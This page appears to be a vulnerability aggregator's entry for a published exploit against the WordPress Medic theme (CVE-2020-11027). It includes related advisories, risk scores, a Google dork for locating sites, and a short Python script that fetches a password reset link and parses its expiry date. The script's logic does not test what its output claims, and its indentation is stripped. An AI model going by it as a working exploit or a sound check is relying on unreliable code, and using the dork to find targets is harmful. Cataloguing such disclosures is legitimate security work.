WordPress Theme Medic 1.0.0 Weak Password Recovery Mechanism

🗓️ 20 Jun 2023 00:00:00Reported by Amirhossein BahramizadehType

packetstorm🔗 packetstormsecurity.com👁 331 Views

WordPress Theme Medic 1.0.0 Weak Password Recovery Mechanism Exploi

Reporter	Title	Published	Views	Family All 69
0day.today	WordPress Medic Theme v1.0.0 - Weak Password Recovery Mechanism for Forgotten Password Exploit	19 Jun 202300:00	–	zdt
BDU FSTEC	The vulnerability of the wp_insert_user function and testWPUpdateUser_should_deleteUsersLugsCache (user.php) in the WordPress content management system allows attackers to access sensitive data and compromise its integrity.	14 Aug 202000:00	–	bdu_fstec
CNVD	WordPress Access Restriction Bypass Vulnerability (CNVD-2020-27079)	7 May 202000:00	–	cnvd
CVE	CVE-2020-11027	30 Apr 202000:00	–	cve
Cvelist	CVE-2020-11027 Password reset links invalidation issue in WordPress	30 Apr 202000:00	–	cvelist
Debian	[SECURITY] [DLA 2208-1] wordpress security update	11 May 202013:43	–	debian
Debian	[SECURITY] [DSA 4677-1] wordpress security update	6 May 202006:30	–	debian
Debian	[SECURITY] [DSA 4677-1] wordpress security update	6 May 202006:30	–	debian
Debian CVE	CVE-2020-11027	30 Apr 202000:00	–	debiancve
Tenable Nessus	Debian DLA-2208-1 : wordpress security update	12 May 202000:00	–	nessus

`# Exploit Title: WordPress Theme Medic v1.0.0 - Weak Password Recovery Mechanism for Forgotten Password  
# Dork: inurl:/wp-includes/class-wp-query.php  
# Date: 2023-06-19  
# Exploit Author: Amirhossein Bahramizadeh  
# Category : Webapps  
# Vendor Homepage: https://www.templatemonster.com/wordpress-themes/medic-health-and-medical-clinic-wordpress-theme-216233.html  
# Version: 1.0.0 (REQUIRED)  
# Tested on: Windows/Linux  
# CVE: CVE-2020-11027  
  
import requests  
from bs4 import BeautifulSoup  
from datetime import datetime, timedelta  
  
# Set the WordPress site URL and the user email address  
site_url = 'https://example.com'  
user_email = '[email protected]'  
  
# Get the password reset link from the user email  
# You can use any email client or library to retrieve the email  
# In this example, we are assuming that the email is stored in a file named 'password_reset_email.html'  
with open('password_reset_email.html', 'r') as f:  
email = f.read()  
soup = BeautifulSoup(email, 'html.parser')  
reset_link = soup.find('a', href=True)['href']  
print(f'Reset Link: {reset_link}')  
  
# Check if the password reset link expires upon changing the user password  
response = requests.get(reset_link)  
if response.status_code == 200:  
# Get the expiration date from the reset link HTML  
soup = BeautifulSoup(response.text, 'html.parser')  
expiration_date_str = soup.find('p', string=lambda s: 'Password reset link will expire on' in s).text.split('on ')[1]  
expiration_date = datetime.strptime(expiration_date_str, '%B %d, %Y %I:%M %p')  
print(f'Expiration Date: {expiration_date}')  
  
# Check if the expiration date is less than 24 hours from now  
if expiration_date < datetime.now() + timedelta(hours=24):  
print('Password reset link expires upon changing the user password.')  
else:  
print('Password reset link does not expire upon changing the user password.')  
else:  
print(f'Error fetching reset link: {response.status_code} {response.text}')  
exit()  
  
  
`

20 Jun 2023 00:00Current

7.1High risk

Vulners AI Score7.1

CVSS 25.5

CVSS 3.16.1 - 8.1

EPSS0.13625